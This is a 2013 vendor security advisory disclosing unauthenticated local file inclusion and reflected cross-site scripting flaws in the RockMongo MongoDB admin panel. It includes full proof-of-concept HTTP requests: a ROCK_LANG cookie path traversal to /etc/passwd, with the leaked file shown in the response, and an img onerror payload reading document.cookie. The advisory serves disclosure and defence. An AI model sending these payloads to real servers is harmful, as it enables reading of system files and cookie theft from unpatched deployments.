Trustwave SpiderLabs Security Advisory TWSL2013-026: 
Multiple Web Application Vulnerabilities in RockMongo

Published: 8/16/13
Version: 1.0

Vendor: RockMongo (http://rockmongo.com/)
Product: RockMongo

Versions affected: v1.1.5 and prior

Product description:
RockMongo is a web-based database management GUI for the MongoDB database.

Finding 1: Local File Include and Path Traversal Vulnerability
**** Credit: Damian Profancik of Trustwave SpiderLabs
CVE: CVE-2013-5107
CWE: CWE-23

RockMongo is vulnerable to a Local File Include and Path Traversal
Vulnerability. Specifically, modifying the the ROCK_LANG cookie.

This vulnerability does not require an attacker to be authenticated prior
to performing the exploit. This is because the ROCK_LANG cookie is
processed and included prior to logging in to the application. Below is a
proof of concept for exploiting this vulnerability:

Example 1 (Tested on RockMongo v1.1.2):

#Request

GET /index.php?action=login.index&host=0 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ROCK_LANG=../../../../etc/passwd%00
Connection: keep-alive


#Response

HTTP/1.1 200 OK
Date: Mon, 10 Jun 2013 13:32:57 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.9
Set-Cookie: PHPSESSID=mla2qlmqa810h07qn6bie8qk77; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 4897
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>RockMongo</title>
<script language="javascript" src="js/jquery-1.4.2.min.js"></script>
<script language="javascript" src="js/jquery.textarea.js"></script>
<link rel="stylesheet" href="themes/default/css/global.css" type="text/css" media="all"/>
<script language="javascript">
$(function () {
$(document).click(window.parent.hideMenus);
if ($("textarea").length > 0) {
$("textarea").tabby();
}
});
</script>
</head>
<body>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
landscape:x:103:108::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
statd:x:105:65534::/var/lib/nfs:/bin/false
postfix:x:106:114::/var/spool/postfix:/bin/false
ntop:x:107:116::/var/lib/ntop:/bin/false
mongodb:x:108:65534::/home/mongodb:/bin/false
mysql:x:109:118:MySQL Server,,,:/nonexistent:/bin/false
ntp:x:110:119::/home/ntp:/bin/false
+::::::
<script type="text/javascript">
var showMore = 0;
...

Finding 2: Reflected Cross-Site Scripting Vulnerability
**** Credit: Damian Profancik of Trustwave SpiderLabs
CVE: CVE-2013-5108
CWE: CWE-79

RockMongo is vulnerable to numerous Cross-Site Scripting Vulnerabilities.
Specifically, any parameter that is retrieved with the "xn" function.

This vulnerability does not require an attacker to be authenticated prior
to performing the exploit, as there are vulnerable parameters on the login
page. Below is a proof of concept for exploiting this vulnerability:

Example 1 (Tested on RockMongo v1.1.2):

#Request (The "db" parameter is also vulnerable on the login page)

GET /index.php?action=login.index&host=0&username="><img+src%3D1+onerror%3Dalert(document.cookie)> HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

#Response

HTTP/1.1 200 OK
Date: Mon, 10 Jun 2013 14:01:52 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3658
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
<title>RockMongo</title>
...
<tr>
<td nowrap>UserName:</td>
<td><input type="text" name="username" value=""><img src=1 onerror=alert(document.cookie)>" style="width:150px"/></td>
</tr>
...

Vendor Response:
No response received.

Remediation Steps:
No patch currently exists for this issue. However, administers can mitigate
these vulnerabilities by applying Web Application Firewall (WAF) rules.
ModSecurity (http://www.modsecurity.org/) has added rules to the commercial
rules feed for these issues, and WebDefend has protections as well.

Vendor Communication Timeline:
06/21/13 - Attempt to contact to vendor
08/09/13 - Attempt to contact to vendor
08/16/13 - Advisory published


About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.